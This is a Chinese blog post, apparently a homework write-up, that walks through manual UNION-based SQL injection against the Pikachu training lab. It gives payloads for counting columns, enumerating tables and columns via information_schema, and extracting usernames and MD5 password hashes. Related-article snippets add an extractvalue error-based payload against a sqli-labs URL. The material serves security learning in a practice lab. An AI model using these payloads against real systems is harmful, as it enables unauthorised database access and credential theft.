实验11:information_schema注入

最新推荐文章于 2024-01-26 08:00:00 发布
最新推荐文章于 2024-01-26 08:00:00 发布
阅读量309 收藏 2
点赞数
CC 4.0 BY-SA版权
分类专栏: 作业
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_44720671/article/details/88937505
本文通过Pikachu平台演示了如何利用SQL注入漏洞获取敏感信息。包括确定注入点、确定字段数、联合查询表名及字段名等步骤,并最终获取用户名与密码。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

information_schema注入

本章是将之前所学的知识融合到一起,进行综合注入
以Pikachu为例,打开字符型注入
在这里插入图片描述

步骤如下:

1、测试是否为注入点
有很多种方法,可以使用工具,或者手工测试,例如输入一个”单引号“
在这里插入图片描述
报错显示到前端,可以进行下一项
2、看有几个字段
使用order by句式来试探
例:hello‘ order by 2#
在这里插入图片描述
表明有两行字段
3、联合查询
①查询表名:例:hello’ union select table_schema,table_name from information_schema.tables where table_schema=‘pikachu’#
在这里插入图片描述
②查询字段名
例:hello’ union select table_name,column_name from information_schema.columns where table_name=‘users’#
得到:
在这里插入图片描述
得到这些信息后,我们很容易就能得到关键的用户名和密码
例:hello’ union select username,password from users#
如图:


此时密码是经过md5加密的,我们可以在网上搜索MD5解密工具,获取真正的密码。

information_schema注入
北冥有鱼
03-30 5048
上一篇文章提到过,information_schema是mysql自带的一个表,这个表里存放了大量信息。 我们可以进去这个数据库简单的看一下 然后输入 show tables, 能看到这里面有很多的表,我们先来看一下tables这个表 可以发现这里面有很多的字段,这些字段包含了这个数据库的名称,这个数据库里的表的名称,表的类型,默认的引擎,版本等等。。这些东西,都会放到这个表里面 还有一...
SQL注入information_schema的作用
ChuMeng1999的博客
09-26 226
这里面,与注入相关的存在3个字段,分别是TABLE_SCHEMA、TABLE_NAME以及COLUMN_NAME,不难猜到,如果在该表中查询一条记录,TABLE_SCHEMA保存了这条记录保存的字段所属的数据库名,而TABLE_NAME保存的是该字段所属表名,COLUMN_NAME则是一个列名记录,查询一条记录验证一下,首先确定该表有多少条记录,执行。这个数据库又是什么?幸运的是,在information_schema数据库中,同样存在一个表,它保存了整个数据中,所有的列名,这个表就是COLUMNS。
Information_Schema注入
qq_45680080的博客
11-02 393
Information_Schema注入 information_schema简单介绍: 打开MySQL数据库——在第二行mysql>处输入show databases(查看在MySQL上的数据库)——在第二行mysql>输入use information_schema;——进入之后在第四行mysql>输入show tables(查看该数据库的表格)——在第三行mysql>...
SQL注入--information_schema注入
arissa666的博客
07-16 555
mysql5.0版本安装之后会有自带的数据库information_schema,存储的是表名和表字段。上面能看到有pikachu数据库里面有users表,根据表名查询,获取表里的字段名。思路:确定数据库,数据库表名,数据库字段名,在用表名字段名查询到字段值。用联合查询语句补齐注入点,能查到pikachu数据库下面有哪些表名。用数据库名字在查数据库有哪些表,用到tables表里面的。查到的密码用cmd5解密就可以。根据字段名,查询到字段值。先确定注入点数据库名字。
http://192.168.0.111:91/Less-5/?id=1' and extractvalue(1,concat(0x7e,select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users',0x7e)) -- q
最新发布
03-15
好的,用户想了解如何防御或检测Less-5 SQL注入实验中的extractvalue函数攻击。首先,我需要回顾一下用户提供的引用内容。引用[1]提到了使用extractvalue函数进行数据库名爆破的方法,引用[4]则解释了攻击者如何利用...
4_实验4:mdvwa-sql注入中级
03-12
好的,我需要处理用户关于MDVWA SQL注入中级实验的请求。首先,用户询问的是指南和解决方案,我需要确保自己了解MDVWA的中级SQL注入防护机制。MDVWA可能和DVWA类似,不同级别有不同的安全措施。中级可能过滤了一些...
SQL注入:联合查询的三个绕过技巧
qq_68163788的博客
01-26 3293
在SQL注入中,可以利用科学计数法来绕过对输入的限制。例如,可以使用科学计数法来绕过对字符串长度的限制,通过将字符串拆分成多个部分并使用科学计数法来表示。此外,还可以利用数据库的特定特性或语法来替代原始的查询语句,从而执行联合查询或其他恶意操作。另外,还可以尝试利用无列名注入的技巧,通过在原始查询中使用通配符或其他方式来绕过对列名的限制,从而执行恶意操作。
Sql注入前置知识之information_schema数据库
BetsyMyGirl的博客
11-30 1493
概述 Mysql5.0以上, Mysql自带了Information_schema这个数据库, 5.0以下是没有的,information_schema 数据库跟 performance_schema 一样,都是 MySQL 自带的信息数据库。其中 performance_schema 用于性能分析,而 information_schema 用于存储数据库元数据(关于数据的数据),例如数据库名、表名、列的数据类型、访问权限等。 实际运用 select table_name from information_
information_schema数据库在SQL注入中的应用.docx
06-11
本文介绍了information_schema数据库的三张重要的表"schemata"、“tables”和“columns”在SQL注入中的应用思路。
informaton_schema注入
weixin_44720762的博客
04-06 247
在开始schema注入之前,首先对information-schema做一些简单的介绍,一下的信息来源于百度文库查询,读者可以直接从百度问库查找到更详细的information-schema介绍。 schemata表: 这里面包括数据库的名称,版本。 tables表: 具体表中的内容显示如下 columns表: 表中具体内容显示如下 除了以上的表以外,information-schema中还有许...
渗透测试-地基篇-数据库-IFORMATION_SCHEMA 详解(五)
qq_34801745的博客
11-17 1062
** 渗透测试-地基篇-数据库-IFORMATION_SCHEMA 详解(五) ** 作者:大余 时间:2020-11-17 简介: 渗透测试-地基篇: 该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。 请注意: 对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 名言: 你对这
mysql注入information_mysql手注入information_schema数据库详解
weixin_35659005的博客
02-03 469
一、作为一个半道出家的萌新,深知在二、MySQL知己知彼,百战不殆,要想玩好SQL注入必须了解1、库(database):MySQL图书馆:而在数据库中它是这样的:2、表(table):表可以理解为存在于库中的二级目录,接上例子:类似于图书馆里的的书架,一个书架就是一个表,书架上贴的分类标签就是表名。书架:而在数据库中是这样的:3、列(column):列是存在于表中的目录,一个表中存在一个或多个列...
SQL注入之——union以及information_schema手工注入
温柔小薛的博客
04-02 1582
SQL注入之union以及information_schema手工注入 目录SQL注入之union以及information_schema手工注入union 注入确认字段个数使用union针对查出来的字段数做一个SQL语句拼接information_schema 注入先通过之前的union先找出数据库的名称获取pikachu数据库的表名获取 pikachu 数据库的字段名最后获取敏感字段值的内容 ...
张小白的渗透之路(六)——SQL注入的思路、流程及SQL的CONCAT系列函数、Information_schema数据库讲解
Litbai_zhang
10-31 2117
前言 关于SQL注入理论的内容,小白之前的博客有写,有兴趣的可以去看一看哦~SQL注入原理详解 实践 ps: 实验的环境小白用的sqli-labs的第一关,下面让我们开始吧 第一关呢提示我们可以用数字型的注入就可以过啦 我们在url输入 ?id=1 结果显示通关啦 当然,小白的目的不是写通关攻略,所以接下来让我们继续以这个例子来更深入的理解一下SQL注入的思路。 那么比方说我现在想获取的是数...
SQL注入.系统数据库information_schema
newlife1441的博客
08-06 559
mysql的系统数据库information_schema中,经常利用系统数据库配合union联合查询来获取数据库相关信息,因为系统数据库中所有信息都在这个数据库里面,常常被利用的表有TABLES以及存放列相关信息的COLUMNS、还有数据库相关信息的SCHEMATA表📔📓。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值